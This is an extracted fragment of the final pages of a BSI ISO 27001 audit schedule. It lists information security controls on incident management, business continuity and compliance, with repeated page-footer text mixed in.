A.15.2.2 Managing changes to supplier services
A.16.1 Management of information security
incidents and improvements
A.16.1.1 Responsibilities and procedures
A.16.1.2 Reporting information security events
A.16.1.3 Reporting information security weaknesses
ISM02101ENGX v2.0 Nov 2017
Year 1
Jul-20xx
Jan-20xx
©The British Standards Institution 2017
Year 2
Jul-20xx
Jan-20xx
Year 3
Jul-20xx
Toolkit
Jan-20xx
35 of 36
Audit schedule
A.16.1.4 Assessment of and decision on information
security events
A.16.1.5 Response to information security incidents
A.16.1.6 Learning from information security incidents
A.16.1.7 Collection of evidence
A.17.1 Information security continuity
A.17.1.1 Planning information security continuity
A.17.1.2 Implementing information security
continuity
A.17.1.3 Verify, review and evaluate information
security continuity
A.17.2 Redundancies
A.17.2.1 Availability of information processing
facilities
A.18.1 Compliance with legal and contractual
requirements
A.18.1.1 Identification of applicable legislation and
contractual requirements
A.18.1.2 Intellectual property rights (IPR)
A.18.1.3 Protection of records
A.18.1.4 Privacy and protection of personally
identifiable information
A.18.1.5 Regulation of cryptographic controls
A.18.2 Information security reviews
A.18.2.1 Independent review of information security
A.18.2.2 Compliance with security policies and
standards
A.18.2.3 Technical compliance review
ISM02101ENGX v2.0 Nov 2017
Year 1
Jul-20xx
Jan-20xx
©The British Standards Institution 2017
Year 2
Jul-20xx
Jan-20xx
Year 3
Jul-20xx
Toolkit
Jan-20xx
36 of 36